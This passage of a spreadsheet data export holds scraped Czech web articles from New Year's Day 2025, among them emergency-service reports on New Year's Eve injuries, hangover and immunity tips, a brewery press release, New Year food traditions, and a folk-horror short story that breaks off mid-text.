ale ve chvíli, kdy je ho moc, stává se podnětem pro zdravotní problémy, nebo může bojkotovat naše snahy o transformaci těla. Ve stresu totiž tělo ve větší míře produkuje hormon kortizol, který umí v těle napáchat pořádnou paseku. Proto se dobré nezapomínat na to, že je potřeba mít něco, co nám pomůže stres regulovat. Může to být sport, meditace, procházky, návštěva wellnessu, hudba, masáž, nebo třeba dobrá knížka. Zdrojem stresu mohou být právě i nereálná předsevzetí, vysoké nároky nebo zkrátka jen nenaplněná očekávání směrem k našim cílům. Proto se vraťte zpět k bodu číslo jedna a volte svoje cíle pro nový rok rozumně. Nejen v oblasti fitness a zdravého stravování, ale kdekoliv jinde. Doporučujeme Autor: kulturistika.com</t>
  </si>
  <si>
    <t>11840</t>
  </si>
  <si>
    <t>20250101_254_3695237824_bd208d93b90fe15c0f09.html</t>
  </si>
  <si>
    <t>bd208d93b90fe15c0f09</t>
  </si>
  <si>
    <t>Amputace prstů i úrazy oka. Lékaři záchranky se o silvestrovské noci nezastavili</t>
  </si>
  <si>
    <t>Amputace prstů i úrazy oka. Lékaři záchranky se o silvestrovské noci nezastavili „První výjezd tohoto roku uskutečnila posádka záchranky v Uničově deset minut po půlnoci. Vyjížděla k muži středního věku, který při zapalování pyrotechniky utrpěl úraz oka a byl převezen k dalšímu vyšetření na urgentní příjem Fakultní nemocnice v Olomouci ,“ shrnul mluvčí krajské záchranky Břetislav Bolard. Muž přišel o prsty Na noční směně patřily mezi nejvytíženější výjezdové skupiny ty ze základny v Přerově . „K úrazům spojeným s pyrotechnikou jsme vyjížděli celkem čtyřikrát. Už před osmou hodinou večer jsme řešili amputaci prstů horní končetiny u muže středního věku v Olomouci . K dalším úrazům pak došlo v rámci silvestrovského ohňostroje - ve dvou případech se jednalo o úrazy oka, v jednom o zranění horní končetiny,“ vyjmenoval mluvčí. Nehody O nepříjemnou dohru silvestrovské noci se postaral také alkohol . „Ve dvanácti případech jsme ve spolupráci s policií řešili napadení, čtyři výjezdy byly spojené s řezným poraněním a pouze jeden kvůli intoxikaci alkoholem , což nás velice překvapilo a děkujeme za toto super číslo,“ zhodnotil mluvčí záchranky. „Výjezdů k úrazům v opilosti bylo deset - toto číslo oproti loňsku naopak vzrostlo,“ upřesnil. Policisté uklidňovali lidi Policisté v Olomouckém kraji přijali na Silvestra od 19 hodin večer do sedmé hodiny ráno celkem 144 oznámení. „Jednalo se převážně o události spojené s pyrotechnikou nebo rušením nočního klidu. V jednom případě to byl také vandalismus na osobním vozidle. Svou roli sehrál i alkohol - šest lidí jsme převezli na záchytku,“ shrnul krajský mluvčí policie Libor Hejtman. Sledujte s Deníkem práci našich hasičů, policistů a záchranářů. | Video: HZS , ZZS a Policie Moravskoslezského, Zlínského a Olomouckého kraje Podle jeho slov naštěstí policie nemusela řešit žádný vážnější incident. Olomoucko Aktualizujeme Olomoucko play_fill Olomoucko Krimi play_fill Šumpersko play_fill Přerovsko Autor: Petra Poláková-Uvírová Autor Petra Poláková-Uvírová</t>
  </si>
  <si>
    <t>30080</t>
  </si>
  <si>
    <t>36570</t>
  </si>
  <si>
    <t>20250101_255_3695584344_9b14a0f0723c1257631b.html</t>
  </si>
  <si>
    <t>9b14a0f0723c1257631b</t>
  </si>
  <si>
    <t>Silvestr v Královéhradeckém kraji s rvačkami a požáry, od pyrotechniky tři úrazy</t>
  </si>
  <si>
    <t>Silvestr v Královéhradeckém kraji s rvačkami a požáry, od pyrotechniky tři úrazy 1. ledna 2025 9:56 , aktualizováno 12:35 Sdílet článek ilustrační snímek | foto: Metro.cz Silvestrovské oslavy v Královéhradeckém kraji provázela fyzická napadení, rvačky, výtržnosti, rušení nočního klidu, drobné požáry. Většinu z nich způsobili opilci. Policie v kraji od úterních 18:00 do dnešních 06:00 přijala okolo 190 oznámení, což bylo na úrovni loňského roku. Uvedla to mluvčí policie Karolína Macháčková. Zdravotničtí záchranáři řešili tři drobné popáleniny od zábavní pyrotechniky. Hasiči hodnotí silvestrovské oslavy v kraji jako poklidné. Zdravotničtí záchranáři o silvestrovské noci zasahovali u 64 událostí, což byl meziročně mírný pokles. Operátoři tísňové linky odbavili 116 volání. "Noc se opět neobešla bez případů intoxikace v důsledku nadměrné konzumace alkoholu . K nim naše posádky vyjížděly šestkrát, z toho dvakrát k dětským pacientům," uvedla mluvčí záchranářů Lucie Hanušová . Desetkrát zdravotničtí záchranáři vyjížděli k úrazům opilců, šestkrát ke zraněným z rvačky. "Silvestrovské oslavy proběhly v Královéhradeckém kraji spíše poklidně," uvedli hasiči. Od silvestrovských 18:00 do dnešních 06:00 zasahovali u 17 událostí, což bylo stejně jako před rokem. "Jednalo se například o požáry odpadkových košů a kontejnerů, v několika případech jsme hasili obaly od použité pyrotechniky. Vše bez vyšších škod," uvedli hasiči. V obci Sloupno na Hradecku dnes ráno hasili požár osobního auta. Po 08:00 zasahovali u převrácené dodávky na dálnici D11 u Hradce Králové . Policisté v Hradci Králové na silvestra večer zajistili řidiče osobního auta, který měl v dechu dvě promile alkoholu . Zhruba dvě hodiny před silvestrovskou půlnocí pátrali po vozidle, které podle oznámení svědkyně mělo jet na dálnici D11 v protisměru. Hlídky úsek dálnice projely v obou směrech, ale vozidlo nenašly. Ani dálniční kamery jej nezachytily. Ve Špindlerově Mlýně , Skuhrově nad Bělou, Třebechovicích pod Orebem a v Mostku policie o silvestrovské noci pátrala po ztracených lidech. "Ve všech případech byli všichni po krátké chvíli nalezeni a všechna pohřešování měla šťastný konec," uvedla mluvčí policie. Autor: ČTK Sdílet článek Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20250101_256_3695009392_005a40e9e048d611fd9e.html</t>
  </si>
  <si>
    <t>005a40e9e048d611fd9e</t>
  </si>
  <si>
    <t>Jsem abstinent aneb závislí bojují nejtěžší boj v životě..</t>
  </si>
  <si>
    <t>Jsem abstinent aneb závislí bojují nejtěžší boj v životě.. Už několik let jsem dobrovolný abstinent. Prostě nepiju. Vím jaké zlo je jakákoliv závislost a v padesáti letech si nepotřebuju alkoholem nic dokazovat. Alkohol mi nikdy moc nechutnal ani jsem neměla nikdy s pitím problémy. Je mi jasné, co většina lidí dělala na Silvetstra. Prostě pila a slavila. Nikoho nesoudím, každý si můžeme dělat co chceme a co nám vyhovuje. Moc dobře vím, co je to závislost. Zajímám se o ní několik let. Náhodou jsem narazila na youtube na skvělý kanál o Abstinentech JAS Jablonec. Většina těch lidí roky pije, fetuje nebo gambluje. Závislost je prostě nemoc a vystoupit z ní není vůbec lehké. Tito závislí žijí třeba roky na ulici a ty životní story jsou děsivé i plné odhodlání. Hodně lidí abstinovat nedokáže a z léčeben utíkají na revers. Někdo to zvládne, třeba až po letech, kdy se dostaví to příslovečné dno, kdy už jde o život. Většina závislých má nějaké trauma a nepřijetí z dětství či duševní onemocnění. Nikdy bych se nikomu nevysmívala, ikdyž ty příběhy, kam až člověka může závislost dovést, jsou šílené. Kromě alkoholu a drog se tito lidé dostávají i do toxických vztahů a z nich pak mají děti, ketré třeba končí v pěstounské péči. Když jsem se na to v noci dívala, tak mě napadlo jedno slovo. A to vděčnost. Vděčnost za to, že mám kde bydlet a co jíst. Život není sranda a s jakoukoli závislostí se stává peklem. Moc držím palce všem z Jablonce okolí, co bojují se svou nemocí i předsudky některých lidí. Ono dostat se z ulice bez závislosti není jednoduché. Se závislostí se to zdá téměř nemožné. Možná by jeden den v roce měly zmizet veškeré reklamy na alkohol a šťastné obličeje. Myslím, že všichni závislí, co bojují svůj nejtěžší boj v životě, by si to zasloužili. Autor: Blanka Fay Autor Blanka Fay</t>
  </si>
  <si>
    <t>20250101_257_3695044848_17e85656e4885dc9fb43.html</t>
  </si>
  <si>
    <t>17e85656e4885dc9fb43</t>
  </si>
  <si>
    <t>Podívejte se: Mírové náměstí v Jablonci s příchodem Nového roku</t>
  </si>
  <si>
    <t>Podívejte se: Mírové náměstí v Jablonci s příchodem Nového roku Ošetřeno bylo v Nemocnici Jablonec nad Nisou od sedmé večerní hodiny 14 pacientů, dva z nich byli zraněni pyrotechnikou. Šlo i o běžné úrazy typu rozražení hlavy, zlomení nohy a podobně, většinou způsobených intoxikací alkoholem . Mohlo by se vám líbit: Stovky lidí běhaly na Silvestr kolem všech tří jabloneckých přehrad Stovky lidí běhaly na Silvestr kolem jablonecké přehrady. | Video: Radka Baloghová Autor: Jan Sedlák Autor Jan Sedlák</t>
  </si>
  <si>
    <t>2660</t>
  </si>
  <si>
    <t>20250101_258_3695305302_659b38a1349451e6949e.html</t>
  </si>
  <si>
    <t>659b38a1349451e6949e</t>
  </si>
  <si>
    <t>Regenerace: Přehnali jste silvestrovské oslavy?</t>
  </si>
  <si>
    <t>Regenerace: Přehnali jste silvestrovské oslavy? Twitter Bujaré silvestrovské oslavy a jejich dopady mohou být různé a liší se podle toho, jak intenzivně se slavilo. Typickým příznakem je kocovina, bolest hlavy, nevolnost, únava, a dehydratace způsobená nadměrnou konzumací alkoholu . Přejídání nezdravých nebo těžkých jídel může způsobit žaludeční nevolnost, pálení žáhy nebo nadýmání. Stres organismu může dočasně oslabit imunitní systém, což zvyšuje riziko nachlazení nebo infekce. Nedostatek spánku a nepřirozený rytmus může narušit fyzickou připravenost. Obecně platí, že konzumace alkoholu a přebytečných kalorií zatěžuje játra a zpomaluje regeneraci organismu. Důsledky je možné minimalizovat preventivními kroky, jako je umírněná konzumace alkoholu , dostatečný pitný režim a plánování času na odpočinek. Pokud se stalo, že jste přehnali silvestrovské oslavy, tak je důležité věnovat čas potřebné regeneraci a co nejdříve obnovit rovnováhu v těle a s tím spojenou kondici. Klíčová pro obnovu kondice po oslavách je hydratace. Obecně známá pravda je, že alkohol - tím spíše konzumovaný ve větším množství - dehydruje tělo, takže je klíčové doplnit tekutiny. Doporučení je jednoduché. Pijte vodu, minerální vody nebo iontové nápoje (sodík, draslík,...), které pomáhají obnovit elektrolytovou rovnováhu. Elektrolytová rovnováha je rovnovážný stav mezi koncentrací různých iontů (elektrolytů) v buňkách a ve tkáňovém moku, který buňky obklopuje. Mezi elektrolyty obsažené ve větším množství v buňkách se řadí například draslík, hořčík či fosfáty. Zelený čaj, mátový nebo zázvorový čaj mohou pomoci zlepšit metabolismus a trávení. Detoxikaci organismu mohou napomoci přírodní doplňky stravy, jako je ostropestřec mariánský, který podporuje regeneraci jater. Naopak se vyhněte se slazeným nápojům a kofeinu (káva, Coca-Cola, Kofola, energetické nápoje,...), které mohou zhoršit dehydrataci. Chceš podpořit www.trenink.com? Odebírej kanál YouTube! Vedle obnovy správného pitného režimu a hydratace je stejně důležitá výživa, kdy je třeba po silvestrovských oslavách konzumovat nikoliv zbytky z oslav posledního dne v roce, ale zaměřit se na jídla bohatá na vitamíny a minerály. Skvělou rychlou volbou jsou banány, které obsahují draslík a pomáhá proti svalovým křečím a dehydrataci. Kuřecí vývar nebo zeleninová polévka pomohou zklidnit žaludek a dodat energii. Toasty nebo suchary jsou snadno stravitelné a pomáhají při žaludeční nevolnosti. Za úvahu stojí také potraviny bohaté na bílkoviny (vajíčka, libové maso) pro obnovu svalů. Vyhněte se těžkým, mastným nebo kořeněným jídlům, která mohou dráždit žaludek. Třetí oblast na kterou je třeba se zaměřit je regenerace pomocí spánku. Po bujarých oslavách je kvalitní spánek klíčový. Tělo se během spánku regeneruje, a to včetně svalů.K regeneraci se doporučuje přistoupit aktivně a to formou protahování a lehkého cvičení. Ráno po probuzení a hydrataci je vhodné provést dynamické protahování, které napomůže zvýšení průtoku krve ve svalech. Relaxace v podobě teplé sprchy nebo koupele může uvolnit svaly a podpořit pocit pohody. Lehký běh nebo procházka na čerstvém vzduchu může pomoci urychlit metabolismus a podpořit okysličení těla. Využijte ledovou lázeň nebo saunu, což podpoří regeneraci svalů a zlepší cirkulaci. Vyhněte se však intenzivnímu tréninku, dokud se necítíte zcela fit. Pokud se stav nezlepšuje, tak proti bolesti hlavy mohou pomoci paracetamol nebo ibuprofen. Pokud máte podrážděný žaludek vyhněte se aspirinům. Máta pomáhá proti nevolnosti. V lékárnách jsou dostupné rehydratační prášky nebo tablety (rehydratační roztoky), které obnovují elektrolyty. Pokud vás silvestrovské oslavy příliš vyčerpaly, zvažte, jak se jim v budoucnu vyhnout. Pokud se nevyhnete konzumaci alkoholu , tak je žádoucí jeho střídmá konzumace a ideálně v kombinaci s vodou. Strava by měla být vyvážená. Jezte před a během oslav, aby tělo lépe zvládalo alkohol , pokud ho budete pít. Naplánujte si dostatek času na regeneraci ( spánek ), jak před, tak po oslavě. TIP REDAKCE Autor: Jiří Formánek Autor person Jiří Formánek</t>
  </si>
  <si>
    <t>20250101_259_3695015373_66b7c787a120f556eb7b.html</t>
  </si>
  <si>
    <t>66b7c787a120f556eb7b</t>
  </si>
  <si>
    <t>Trápí vás slabá imunita? Poradíme, jak se vyhnout bacilům</t>
  </si>
  <si>
    <t>Trápí vás slabá imunita? Poradíme, jak se vyhnout bacilům Od Anna Raková - středa, 1. leden 2025 09:51 Ilustrační. Foto: Unsplash V období zimních měsíců jsme náchylnější různým infekcím, nachlazením a chřipkám. Slabá imunita může znamenat, že jste častěji nemocní, cítíte se unavení a máte problémy s regenerací. Naštěstí existují jednoduché kroky, jak svou imunitu posílit a minimalizovat riziko bacilů. Přečtěte si, jak na to! 1. Správná strava pro silnou imunitu Imunitní systém potřebuje kvalitní palivo, aby mohl efektivně bojovat proti virům a bakteriím. Zahrňte do své stravy potraviny bohaté na vitamíny a minerály. Vitamin C (například v citrusových plodech) posiluje obranyschopnost a pomáhá v boji proti infekcím. Nezapomeňte ani na vitamín D (například v tučných rybách), který kromě potravin můžete získat i ze slunce. 2. Dopřejte si dostatek spánku Spánek je základem regenerace těla a posilování imunitního systému. Během spánku tělo vyplavuje toxiny a obnovuje buněčné procesy. Pokud spíte 7-8 hodin denně, pomáháte své imunitě fungovat efektivněji a rychleji reagovat na hrozby z okolí. Naopak nedostatek spánku může zvýšit vaši náchylnost k nemocem. 3. Pravidelný pohyb Fyzická aktivita je nejen prospěšná pro vaše srdce a tělo, ale má také pozitivní vliv na imunitní systém. Cvičení zlepšuje prokrvení, čímž se zrychlí transport buněk, které bojují proti infekcím. Když se aktivně pohybujete, posilujete obranyschopnost těla a podporujete celkovou regeneraci. Stačí i krátká, pravidelná procházka na čerstvém vzduchu. 4. Omezte stres Dlouhodobý stres má negativní dopad na imunitu. Pokud chcete podpořit imunitu, naučte se relaxační techniky jako je meditace, dechové cvičení nebo jóga. Pravidelný odpočinek a psychické zdraví jsou klíčovými atributy pro odolnost proti nemocím. 5. Pijte dostatečné množství tekutin Neméně důležitá je i hydratace. Voda nejenže zajišťuje správné fungování buněk, ale také pomáhá udržovat vlhkost sliznic, které tvoří první bariéru proti bacilům. Během dne si pravidelně dopřávejte dostatek tekutin, nejlépe vody nebo bylinných čajů. Slabá imunita může způsobovat časté nachlazení, únavu a celkové zhoršení zdravotního stavu. Naštěstí existuje mnoho způsobů, jak ji posílit a vyhnout se bacilům. Začněte se soustředit na správnou výživu, vyhněte se přehnané konzumaci alkoholu a omezte kouření, zaveďte pravidelný pohyb a dostatek spánku. Díky těmto jednoduchým opatřením zvýšíte šanci, že se bacilům vyhnete. Autor: Administrator () Rubrika transition_slide Aktuálně</t>
  </si>
  <si>
    <t>716</t>
  </si>
  <si>
    <t>731</t>
  </si>
  <si>
    <t>20250101_26_3698619585_548a43f05f778adbcb93.html</t>
  </si>
  <si>
    <t>548a43f05f778adbcb93</t>
  </si>
  <si>
    <t>Jídla na Nový rok</t>
  </si>
  <si>
    <t>Jídla na Nový rok Moderátor Rey Koranteng : Jsou jídla, která byste na Nový rok rozhodně neměli konzumovat. Zapovězena je například drůbež. Moderátor Lucie Borhyová : Naopak podle tradic existují pokrmy, které by 1. ledna neměly chybět na jídelní tabuli. Strávníkům totiž nadcházejícím roce mohou přinést štěstí a blahobyt. Autor Michaela Klárová: Pojídání čočky na Nový rok prý přinese štěstí a peníze. Podle lidových tradic svým tvarem připomíná mince. Luštěninu každoročně na 1. ledna nevynechá ani paní Romana z Českých Budějovic . Tradice se prý snaží dodržovat hlavně kvůli dětem. Romana Šálková: Že se říká, že to přináší peníze a naopak vyhýbáme se králičímu, rybímu a kuřecímu masu, protože se říká, že by nám mohlo odhopkat, odplavat nebo odletět štěstí. Dominik: Já nemám čočku rád, ale na nový rok ji jím, protože mě mamka nutí. Autor Michaela Klárová: Blahobyt by mohla zajistit konzumace i jiných luštěnin, stejně kouzelnou moc má prý hrách. Romana Šálková: A baštíme buď zelí, nebo kapustu nebo jinou zelenou zeleninu kvůli tomu, že vlastně údajně symbolizuje vlastně ta zelená zelenina bankovky. Anketa: Čočku, abychom měli dost peněz. Vepřový. Prasátko nikam nevítá a nikam neutíká. Vaříme čočku. Autor Michaela Klárová: Někteří lidé místo čočky volí variantu fazolí. Ty se jí především ve Spojených státech , v Rakousku a Maďarsku nesmí chybět vepřové a některé národy upřednostňují vepřové rypáčky. Vepři totiž zaryjí čumák do země, necouvají a postupují vpřed. A tak by měl podle pranostik vypadat i následující rok. Fazole, pověst šťastné potraviny dostaly už ve starověkém Egyptě . Důvodem jejich pojídání na Nový rok je ale spíše pragmatický. Stejně jako ostatní luštěniny byly dříve dostupné i těm nejchudším lidem. Pojídání dvanácti kuliček hroznového vína nebo jakéhokoliv kulatého ovoce na Nový rok k nám zřejmě dorazilo od Španělů. Jednotlivé sladké hrozny symbolizují vždy jeden šťastný měsíc v roce. Někdo naopak peče sladké moučníky, do kterých zatéká mince. Šťastný strávník, který ve své porci najde, prožije podle pranostiky rok v blahobytu byl pan. Johanka: Byl tam penízek. Autor Michaela Klárová: Na asijských stolech zase nesmí chybět nudle, jejichž délka symbolizuje dlouhý život.</t>
  </si>
  <si>
    <t>20250101_260_3695008593_32b21848e68faea6864b.html</t>
  </si>
  <si>
    <t>32b21848e68faea6864b</t>
  </si>
  <si>
    <t>Obliba piva Bernard roste. Prodalo se ho nejvíce v historii Rodinný pivovar Bernard v roce 2024 vystavil 419 tisíc hektolitrů piva , nejvíce za 33 let existence. Je to o 10 tisíc hl více než v předchozím roce. Produkce pivovaru jde proti vývoji na trhu, kde prodej piva dlouhodobě postupně klesá. Dvě třetiny piva Bernard vyčepují restaurace a hospody ze sudů, třetina se prodá v lahvích, přitom na českém trhu je poměr opačný. „Každý rok se vypořádáváme s dalšími překážkami, od covidu přes skokové nárůsty cen energií a surovin, válku na Ukrajině , zvýšení daní, nekončící bujení administrativy až po povodně, jejichž dopad jsme také pocítili. Přesto se nám daří růst. Nemáme to zadarmo, je za tím píle a poctivá práce. Proto nás opravdu těší, že si naše pivo vybírá stále více lidí,“ hodnotí vývoj generální ředitel a vrchní sládek Josef Vávra. „Od počátku usilujeme o co nejvyšší kvalitu piva a služeb a naše snaha přináší výsledky. Věřím v poctivou práci a dobré vztahy s obchodními partery a zákazníky. Má smysl jít vlastní cestou v marketingu a mít schopné obchodníky, kterým se daří nacházet nová odbytiště, i když řada provozoven v posledních letech padla,“ ohlíží se za uplynulým rokem také spolumajitel pivovaru Stanislav Bernard , podle kterého se aktuálními výsledky pivovar přiblížil na hranu svých kapacit. Růst pozastavil pouze covid Výstav Rodinného pivovaru Bernard se kontinuálně zvyšuje od roku 2001 (95 tisíc hl.). Hranici 400 tisíc hektolitrů se mu podařilo přesáhnout poprvé v roce 2019, v následujících letech ovšem přišel pokles prodeje v důsledku opatření proti šíření covidu (zavírání hospod apod.). V roce 2022 byl výstav pivovaru bezmála 398 tisíc hektolitrů, v roce 2023 už 409 tisíc hektolitrů piva . Rodinný pivovar Bernard sídlící v Humpolci na Vysočině exportuje 21 procent své produkce do 25 zemí světa, nejvíce na Slovensko , do Švédska a do Bulharska . Zaměstnává 267 lidí, dalších 28 osob má práci v humnové Sladovně Bernard v Rajhradě u Brna . V roce 2022 pivovar otevřel ve svém areálu Návštěvnické centrum Bernard . V roce 2024 se v soutěži Společnosti přátel piva stal už poosmé pivovarem roku. Další tiskové zprávy Autor: FeedIT.cz Rubrika transition_slide Tisková zpráva</t>
  </si>
  <si>
    <t>607</t>
  </si>
  <si>
    <t>20250101_261_3695027290_ff6df78aa39ea2a92b8a.html</t>
  </si>
  <si>
    <t>ff6df78aa39ea2a92b8a</t>
  </si>
  <si>
    <t>Strašidelný příběh: Zlá noc</t>
  </si>
  <si>
    <t>Shrnutí Strašidelný příběh: Zlá noc 1.1.2025 Zdroj: Designer-Obst/Pixabay.com Karel se blížil k Gentlemans´ clubu dost otráveně. Do háje, zase dělat ožralkovi šoféra! Bráchu je sice možný litovat, ale ožírat se tady každý měsíc je už trochu moc. Na rozvodu mají vinu stejně oba, tak co. A jestli má ještě pořád problémy kvůli hospodářský krizi, má zachraňovat svůj podnik a ne tady chlastat s děvkama. Reklama Konečně vylezl příkrou ulicí od autobusové zastávky k modré vile. Naštěstí nebydlel daleko. Zadýchaně pozdravil gorilu u dveří. Neznal toho chlápka, dneska tu nepřešlapoval Tonda, ale někdo nový. Sotva se vlezl do černého kvádra, jak nabušený měl svaly. „Jdu pro bráchu. Petra Jermana. Udrží se vůbec na nohách?“ Volal mu totiž barman, bráchovi se už nejspíš plete jazyk. Ramenatý chlapík ho přejel pohledem, určitě tipoval Karlovy příjmy. Bratr pana podnikatele, co to tady pravidelně roztáčí? Karel prostě vypadá jako normální pracant z továrny. Gorilák viditelně přemýšlel a moc mu to nešlo. Jenže Karel moc času neměl. „Hele, pusť mě nebo dej vědět Myšákovi, já nemám čas. Jo a klíčky, ty má Petr u sebe?“ „Moment, už to bude.“ Odvrátil se a až teď si Karel všiml, že je vybavený jako špion, má na uchu šipku. Hezká věcička, pro tohohle jí je škoda. „Hele, šéf modernizoval, co? Doufám, že si Tondu nechal.“ „Kolega uvnitř něco řešil. Už vám ho vedou.“ A doprdele, snad se Petr neserval o nějakou šlapku?! To by se mámě rychle doneslo, to by Karel zase slyšel přednášek! Petra sice máma po ruce nemá, ten se v klidu prospí a taky se radši pár dnů neukáže, jenže máma ze sebe stížnosti vychrlí. Na koho? Na prvního, koho vidí. Na Karla přece, samozřejmě. Na syna, co bydlí s ní. I když dneska večer byla nějak tichá, jenom řekla, ať je při jízdě opatrný a že vždycky byl moc hodný chlapec. Otevřely se dveře, Petr kupodivu vycházel po svých. Hned halekal na Karla, že už může pro auto a podával mu klíčky. Vyhazovač Tonda pana podnikatele sice podpíral, ale on ho nejspíš Karel předtím objal pravicí kolem krku a druhou mával jako moravský synek. „No nazdar,“ pozdravil Karel vyhazovače. „Co vyváděl?“ „Dneska je hodnej, Kájo, jako miminko. Nabumbanej, vykoupanej, pára upuštěná, trubičky uvolněný, jestli mi rozumíš.“ Opel už zablikal na pozdrav, Tonda ochotně dovlekl Petra až k vozu. Usadil ho vzadu a opatrně zavřel dveře. Karel chlapům poděkoval a šel šoférovat. Ten nový koukal, jako kdyby čekal spropitné, ale to měl smůlu. Snad mu to Tonda vysvětlí. A jestli ne, mají si to vyřídit s Petrem. Otočil se k němu: „Chceš domů nebo do kanclu?“ „Domu, parťáku, do svýho bytu. Hyjé!“ Rozvalil se jako velký pán. Karel neměl chuť se dohadovat, pokrčil rameny. Ráno si holt dojdeš do kanclu pěšky, aspoň se projdeš, pomyslel si. Auto si nechám, teď od tebe k mámě nepůjdu. Vůbec neměl chuť bráchovi dělat poskoka ještě ráno. Vždyť musí na směnu! Takže to by se milostivý pan Petr divil, kdyby ho Karel vytáhl třeba v pět z postele u mámy. Možná by dělníci u vrátnice udělali šéfovi slavobránu. Před šestou Petra ještě nikdo v práci neviděl. Představa pobavila, ale Karel by už byl nejradši v posteli a pořádně se vyspal. Jenže Petr měl kecavou. „Hele, poslal jsem Míru Bartoše na to tvoje kuře. Vindalů, žejo? Někde nad Václavákem ?“ Karel se málem chytil za hlavu. To měl jednou dobrou náladu, přivezl domů půlku ostře okořeněného kuřete na ochutnání. Vyprávěl, koho tam viděl a jak některé slavné pálila huba. Máma tak ráda poslouchá historky z velkýho světa! Petr, ta krysa zákeřná, se toho chytil a ukradl mu to. A teď to určitě překrucuje tak, že z toho Karel vyjde jako debil. „Neříkej, že si mu vykládal o tom, jak ten můj známej na kuře nestačil. Dyk ani nevěděl, kdo to je!“ „Seví, že ne. Si toho chlapa stejně nepamatuju. Sice se jmenuje jako jeden dobrej chlast , ale těch značek je móře. Tak sem řek, že si to byl ty. Jakože si to nezvlád. Já to jako sežral, čéče, dyž už sem tě jednou vzal do civilizace.“ Takže zase budu za vola, jako vždycky, jak jsem předpokládal, pomyslel si Karel trpce. Brácha dokáže využít všechno, citlivě asi jako buldozer. Mámino princátko, hajzlík z podzemního zámku. V tuhle chvíli tomu stoprocentně věřil, skutečný brácha by se choval jinak. Určitě. Málem přehlédl zablesknutí světel u příkopu, ale měl dost času. Přibrzdil a srna přeskákala vozovku. Koukal, jestli tu někde nebude další, ale mohl pokračovat. „Co je, zahlíd si Bertu?“ Ještě tohle Karlovi scházelo! Nekonečné připomínání té staré záležitosti. Pohádkové stvoření Berta, přízrak ze sudetských časů. Jako by na tom bylo něco špatného? Karla to sice úplně nepustilo, ale před čtyřmi roky fakt chvíli úplně kašlal na učení k matuře a pokoušel se s partou nadšenců vypátrat všechna místa ze starých pověstí. Není lehké vracet krajině její minulost, ale stálo to tehdy za to. Zjistili neuvěřitelné věci, ale zrovna s Bertou si dost naběhli. To se může stát každému, ne? Dozvěděli se spoustu dalšího, tak jeden omyl nic neznamená. Což Petr naprosto nepochopí, kdyby se na kostičky rozkrájel. Smutná dívka Berta, rozdávající děti… Babička tu pověst Karlovi vyprávěla několikrát. Strašila ho, aby nelezl s klukama po lesích nad tratí. Tam, co je ten prudký sráz, otevře se prý občas hluboká studna. Není to studna, ale komín zakletého zámku, co tady kdysi stál a propadl se pod zem. Proto je mezi těmi kopci najednou taková průrva. Býval to kdysi jediný vrch s velikým zámkem a pyšnou kněžnou, která byla hrozně zlá. Pořád chtěla zlato a drahokamy, až ji tíha jejích hříchů a toho bohatství stáhla pod zem. Jenže ani tam se nenapravila. Čas od času prý stahuje komínem dolů neposlušné děti. Má tak nové a nové služebnictvo a někdy je nad mokřadlem u trati slyšet nářek. To kněžna svoje malé sluhy týrá a bije. Jo, Berta, chudák, tu prý do komína shodila macecha. A protože byla nevinná, musela jí kněžna občas v něčem ustoupit. Berta jednou za rok vychází z podzemí s nemluvnětem v náruči. Když jí někdo slíbí, že se ho ujme, do jeho rodiny se duše tohoto dítěte vrátí. Prý až všechny děti rozdá, může sama podat někomu ruku a zůstat na zemi také. Byla to jenom pověst, málokdo o ní ví, ale Hynek z muzea skutečně našel v novinách z poloviny devatenáctého století zmínku, že se beze stopy ztratilo už druhé dítě během roku. Kněžna kašlala na nějakou pravidelnost nebo styl jedno dítě ven a druhé sem. Kradla děti, jak se jí zachtělo. Právě v těch místech. Lidé prý věřili, že zmizelé děti stáhla prokletá kněžna. Bohužel tu slavnou průrvu pro trať ve skutečnosti způsobil dynamit při rovnání terénu, tam se lidi zatraceně sekli. Zrovna Petr na badatele zaútočil v hospodě a Karel nakonec přišel k jeho výsměchu jako slepý k houslím. Ani při té debatě nebyl. Pro Karla to přece byla dlouho jenom strašidelná pověst, s kluky chodil pátrat po komínu spíš pro srandu, aby netrhal partu. Dokud sám v autobuse nezaslechl dvě staré Němky šeptem povídat, že se pořád rodí děti se vzpomínkami z dávných dob. Jsou to hodné děti, velice bystré a vždycky jakoby starší, než by měly být. Nemají tu klid, nemají moc přátel, brzy odcházejí do světa a tam je jim líp. Za paní Hammerschmiedovou potom Karel zašel, ale nechtěla o tom mluvit, křižovala se a zapírala. Že by se jí taky smáli jako té jeho partě. Hodně mu to uvízlo v paměti. Přesto mu najednou při odchodu stará paní řekla, že by měl jít do světa a najít si v něm svoje místo. Tady se totiž tak šikovným a hodným lidem jako on příliš nedaří. Tomuhle Karel nikdy pořádně nerozuměl. Jsou za tím tyhle pověry, co odtud vyhánějí nějak odlišné, chytré lidi? Nechápal to, dokud si po tomhle rozhovoru sám nepřiznal, že je opravdu trochu mimoň. Nejradši by skutečně někam odešel, kdyby ho tu tehdy nedržel táta. Kdo by se o něj v tom čase staral? Máma ho opečovala, Karel nosil na záchod, do koupelny, vozil po doktorech. Chudák, trpěl jako pes, ale aspoň nakonec umřel ve spánku. Jo, Petřík nic nemusel, ten podnikal. Jako duše z podzemního zámku tedy nic moc, fakt asi ten zmizelý princ. Rozmazlenej šlechtickej fakan. Po zásluze se propadnul ke kněžně, ale o potrestaném princi nic nevypátral ani Hynek. Kněžna a princ se totiž historicky nevyskytovali v okolí ani náhodou. Leda snad ještě za prapůvodních Slovanů a o těch víme houby s octem. Babička věřila, že je Petr princem od Berty, protože byl doslova vymodlené dítě, navíc „takovej chcípáček slaboučkej, nemocnej“ a najednou se z velké horečky uzdravil. Zázrakem, to je jisté. Sice jedna sousedka zrovna mámu naučila celkovej zábal, ale to nehraje roli. Táta totiž tehdy Bertu potkal. Zrovna, když s Petrem bylo hodně zle, ztrácel vědomí a chvílemi mu ani srdíčko nebilo. Babička ho s mámou pořád masírovaly a chladily, vázaly na zápěstí citrón a brambory, od sousedů mu marně volaly záchranku. Až mu prý daly ten zábal. Táta byl v na cestě, nic nevěděl. Prostě řídil náklaďák, byla už noc, u silnice holka s rancem v náruči, myslel, že je to nějaká migrantka. Zrovna se otevřely hranice a každou chvíli tady policajti chytali běžence. Jenže holka chovala ten ranec jako mimino, tak zastavil. Holka nějak nevěděla, co jí chce, tma byla jak v pytli, ale když vyskočil a otevřel jí dveře, že ji vysadí, pochopil. Otočila k němu bílou tvář s krásnýma velkýma očima a zeptala se, jestli přijme sirotka za svého. Možná ani nepohnula rty, ale hned prý věděl, že se mu to nezdá. Sirotka přijal, samozřejmě, vždyť jenom na Petra čekali dlouho, než se narodil. 